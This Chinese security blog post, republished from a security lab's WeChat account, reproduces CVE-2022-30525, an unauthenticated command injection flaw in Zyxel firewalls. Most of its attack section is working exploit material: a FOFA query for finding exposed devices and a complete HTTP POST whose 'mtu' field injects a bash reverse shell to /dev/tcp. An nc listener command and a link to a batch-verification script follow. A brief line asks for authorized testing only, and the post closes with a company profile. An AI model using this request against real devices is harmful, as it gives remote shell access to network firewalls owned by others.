漏洞复现 CVE-2022-30525 Zyxel 防火墙命令注入漏洞

admin 2022年5月20日02:52:34评论513 views字数 1025阅读3分25秒阅读模式

0x01 漏洞描述

2022 年 5 月 12 日,Zyxel(合勤)发布安全公告,修复了其防火墙设备中未经身份验证的远程命令注入漏洞(CVE-2022-30525),该漏洞的CVSS评分为9.8。该漏洞存在于某些Zyxel防火墙版本的 CGI 程序中,允许在未经身份验证的情况下在受影响设备上以nobody用户身份执行任意命令


漏洞复现 CVE-2022-30525 Zyxel 防火墙命令注入漏洞


0x02 漏洞复现

漏洞影响:

漏洞复现 CVE-2022-30525 Zyxel 防火墙命令注入漏洞

fofa:body="USG FLEX 50 (USG20-VPN)" 等


1.执行反弹shell命令

POST /ztp/cgi-bin/handler HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36Content-Type: application/jsonConnection: closeContent-Length: 175
{"command":"setWanPortSt","proto":"dhcp","port":"1270","vlan_tagged":"1270","vlanid":"1270","mtu":"; bash -c 'exec bash -i &>/dev/tcp/ip/port <&1';","data":"hi"}

漏洞复现 CVE-2022-30525 Zyxel 防火墙命令注入漏洞


2. nc监听得到shell

nc -lvvp 7777

漏洞复现 CVE-2022-30525 Zyxel 防火墙命令注入漏洞


3. 批量验证参考脚本

https://github.com/Henry4E36/CVE-2022-30525/

(注:要在正规授权情况下测试网站:日站不规范,亲人泪两行)


0x03 公司简介

江西渝融云安全科技有限公司,2017年发展至今,已成为了一家集云安全、物联网安全、数据安全、等保建设、风险评估、信息技术应用创新及网络安全人才培训为一体的本地化高科技公司,是江西省信息安全产业链企业和江西省政府部门重点行业网络安全事件应急响应队伍成员。
    公司现已获得信息安全集成三级、信息系统安全运维三级、风险评估三级等多项资质认证,拥有软件著作权十八项;荣获2020年全国工控安全深度行安全攻防对抗赛三等奖;庆祝建党100周年活动信息安全应急保障优秀案例等荣誉......

编制:sm

审核:fjh

审核:Dog


原文始发于微信公众号(融云攻防实验室):漏洞复现 CVE-2022-30525 Zyxel 防火墙命令注入漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月20日02:52:34
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞复现 CVE-2022-30525 Zyxel 防火墙命令注入漏洞http://cn-sec.com/archives/1023736.html

发表评论

匿名网友 填写信息